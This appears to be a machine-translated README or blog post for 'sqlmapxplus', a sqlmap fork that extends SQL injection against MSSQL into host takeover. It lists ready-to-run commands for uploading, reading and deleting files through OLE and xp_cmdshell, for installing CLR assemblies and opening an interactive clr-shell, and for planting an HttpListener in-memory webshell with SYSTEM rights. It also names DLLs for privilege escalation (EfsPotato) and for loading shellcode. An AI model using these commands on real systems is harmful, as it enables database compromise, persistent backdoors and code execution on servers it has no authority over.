Во многих региональных атаках и оборонительных учениях внедрение стека базы данных SQL Server по-прежнему часто приводит к «дыркам». Однако из-за некоторых общих ограничений сценария тренировки, таких как отсутствие доступа к сети, низкие разрешения, разделение сайта и базы данных, защита терминала, сложность. при подключении к сети поддержка разрешений является обременительной, и только одна --os-shell больше не может удовлетворить наши потребности.
sqlmapxplus основан на sqlmap, заново открывая классический инструмент эксплуатации уязвимостей базы данных, ссылаясь на различные решения и добавляя методы использования внедрения базы данных MSSQL. На данный момент завершена часть второй разработки, включая загрузку файлов ole и функцию автоматической загрузки шеллкода.
20240508 инструкции по обновлению : недавно добавленная функция открытия ole, новая функция чтения указанных файлов, новая функция перемещения указанных файлов, новая функция копирования указанных файлов, новая функция удаления указанных файлов, новая функция определения местоположения указанных файлов, новая функция хранения. Функция запроса процесса, новая функция удаления сохраненного процесса, изменение метода загрузки ole, изменение процесса установки clr, изменение метода выполнения команды clr, удаление ошибок, вызванных китайскими комментариями.
Решение проблемы сбоя установки clr, вызванного потерей передачи dll во время реального сетевого процесса (временное решение). Обнаружено, что dll clr, используемый в исходной функции --install-clr, слишком велик, и выполняется большое количество инъекций. часто требуется в реальном бою. Если в процессе внедрения определенная ошибка приведет к сбою реализации dll, и вход в dll невозможен. Исходный процесс автоматической установки в один клик теперь удален и изменен, чтобы пользователь мог настроить его. dll на основе фактической целевой ситуации и временно добавьте --check-file Этот параметр определяет, успешно ли загружен файл dll на целевой хост. Временно добавьте --check-clr, чтобы определить, успешно ли загружена пользовательская функция в базу данных.
Почему возникает проблема с усилением dll в процессе загрузки? Преобразование в шестнадцатеричный формат и последующее восстановление приводят к увеличению размера файла. Например, буква А преобразуется в 41 в шестнадцатеричном формате, увеличивая размер в два раза.
Проблемы с настройкой clr (завершено) install-clr изменен и требует указания пользовательского пути clr.dll. Введите определяемое пользователем имя класса в поле подсказки и имя определяемого пользователем метода clr_shell mode. Метод выполнения функции clr. в режиме clr_shell изменено на: Пользовательская функция передает параметры (завершено)
File system access: --xp-upload upload file by xp_cmdshell --ole-upload upload file by ole --check-file use xp_fileexis check file exist --ole-del delete file by ole --ole-read read file content by ole --ole-move move file by ole --ole-copy copy file by ole Operating system access: --enable-clr enable clr --disable-clr disable clr --enable-ole enable ole --check-clr check user-defined functions in the database --del-clr delete user-defined functions in the database --install-clr install clr --clr-shell clr shell --sharpshell-upload1 sharpshell upload1 --sharpshell-upload2 sharpshell upload2
насчет Оле :
# 开启 ole 利用功能 python sqlmap.py -r/-u xxx --enable-ole # 通过 ole 上传文件 python sqlmap.py -r/-u xxx --ole-upload local_file_path --file-dest remote_file_path # 通过 ole 删除指定文件 python sqlmap.py -r/-u xxx --ole-del remote_file_path # 通过 ole 阅读指定文件 python sqlmap.py -r/-u xxx --ole-read remote_file_path # 通过 ole 移动并重命名文件 python sqlmap.py -r/-u xxx --ole-move remote_file_path1 --file-dest remote_file_path # 通过 ole 复制文件 python sqlmap.py -r/-u xxx --ole-copy remote_file_path1 --file-dest remote_file_path2 # 通过 ole 实现的HttpListener内存马上传方式 # 默认上传至c:Windowstaskslisten.tmp.txt,需要以system权限运行 python sqlmap.py -r/-u xxx --sharpshell-upload2
другие функции:
# 通过 xp_cmdshell 上传文件 python sqlmap.py -r/-u xxx --xp-upload local_file_path --file-dest remote_file_path # 使用 xp_fileexis 来检查文件是否存在 python sqlmap.py -r/-u xxx --check-file remote_file_path # 查询数据库中是否存在用户自定义函数 python sqlmap.py -r/-u xxx --check-clr clr_function_name # 删除用户自定义函数 python sqlmap.py -r/-u xxx --del-clr clr_function_name # 通过 xp_cmdshell实现的HttpListener内存马上传方式 # 默认上传至c:Windowstaskslisten.tmp.txt,需要以system权限运行 python sqlmap.py -r/-u xxx --sharpshell-upload1
о клр :
# 开启 clr 利用功能 python sqlmap.py -r/-u xxx --enable-clr # 关闭 clr 利用功能 python sqlmap.py -r/-u xxx --disable-clr # 进入 clr 安装模式 python sqlmap.py -r/-u xxx --install-clr # 进入 clr-shell 命令交互模式 python sqlmap.py -r/-u xxx --clr-shell # clr dll 参考如下,更多其他dll请参考星球获取 # 存储过程类名Xplus,存储过程函数名需要注意大小写,分别为 # ClrExec、ClrEfsPotato、ClrDownload、ClrShellcodeLoader # 对应项目目录下单独功能的dll,分别为 clrexec.dll clrefspotato.dll clrdownload.dll clrshellcodeloader.dl
Паблик аккаунт: Кибервойна
Планета Знаний: Руководство по тестированию на проникновение
Ссылка на старую версию: https://mp.weixin.qq.com/s/nTYPKnl9XQLWhZ43sQV3xw.
Ссылка на новую версию: https://mp.weixin.qq.com/s/6RpxXitEPt8rA1DFb56Oxw.
https://github.com/sqlmapproject/sqlmap
https://github.com/uknowsec/SharpSQLTools
https://github.com/Anion3r/MSSQLProxy
https://mp.weixin.qq.com/s/X0cI85DdB17Wve2qzCRDbg
https://yzddmr6.com/posts/asp-net-memory-shell-httplistener/